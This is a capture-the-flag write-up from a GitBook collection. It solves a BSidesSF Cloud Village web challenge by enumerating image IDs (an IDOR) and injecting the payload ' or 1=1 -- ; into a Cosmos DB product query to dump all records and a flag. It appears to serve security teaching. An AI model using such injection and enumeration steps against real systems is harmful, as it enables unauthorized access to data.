Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page
  • Challenge Description
  • Solution

Was this helpful?

  1. 2023
  2. BSidesSF Cloud Village CTF

A Suit of Armor Around The World

PreviousPlain SightNextSharing is Caring + Sequel

Last updated 2 years ago

Was this helpful?

Challenge Description

'A suit of armor around the world' - well that's what Tony saw when making Ultron until it turned rogue. In any alternate universe, (the one we happen to be residing in), Ultron was created, and it did go rogue, just not in the scary ways we know. Ultron started selling Avenger's tech on a "sophisticated" website. As simple as that task may seem, this version of Ultron was pretty bad at staying secure. Can you randomly find something on this site that leads you to some astonishing function-ality?

Start Here

Solution

When interacting with the web application, and retrieving item from the shop, I identified that it is calling image from /Content/{number}.jpg

<div class="card" id="item-card">
        <img class="card-img-top" id="item-img" src="/Content/1.jpg" alt="Image">
        <div class="card-block">
            <h4 class="card-title" id="item-name">Item Name: infinitygauntlet</h4>
            <p class="card-text" id="item-price">Price $100</p>
            <p class="card-text" id="item-amount">Amount 1</p>
        </div>
    </div>

In the website page source, there is only option to retrieve item 1 to item 6.

<option value="1">Infinity Gauntlet</option>
<option value="2">Vibranium Shield</option>
<option value="3">Nano Tech Suit</option>
<option value="4">Universal Translators</option>
<option value="5">Pym Particle Vials</option>
<option value="6">Web Shooters</option>
["{\"id\":\"12345\",\"productid\":\"1\",\"productname\":\"infinitygauntlet\",\"price\":\"$100\",\"amount\":1,\"_rid\":\"SrU1AP2OrncIAAAAAAAAAA==\",\"_self\":\"dbs/SrU1AA==/colls/SrU1AP2Ornc=/docs/SrU1AP2OrncIAAAAAAAAAA==/\",\"_etag\":\"\\\"1701fcbf-0000-0700-0000-643aed3f0000\\\"\",\"_attachments\":\"attachments/\",\"_ts\":1681583423}"]

When replacing the productid value to ' it shows a sql syntax error

There is some problem with your query, just for this once Ultron shall provide you your query string to debug SELECT * FROM c WHERE c.productid = '''

Flag: flag-{oncg3EWYmbVe8KZ5NtVPu88Td2CuQ9yk}

It could possibly be a vulnerability

After manually enumerating, 7.jpg shows 404 error, while retrieved something interesting

Visiting the shows a JSON output that is output from a Cosmos DB

I am then able to set the productid to to retrieve everything within the cosmosdb and get the flag

IDOR
0.jpg
URL
' or 1=1 -- ;
https://avengersupplies.azurewebsites.net/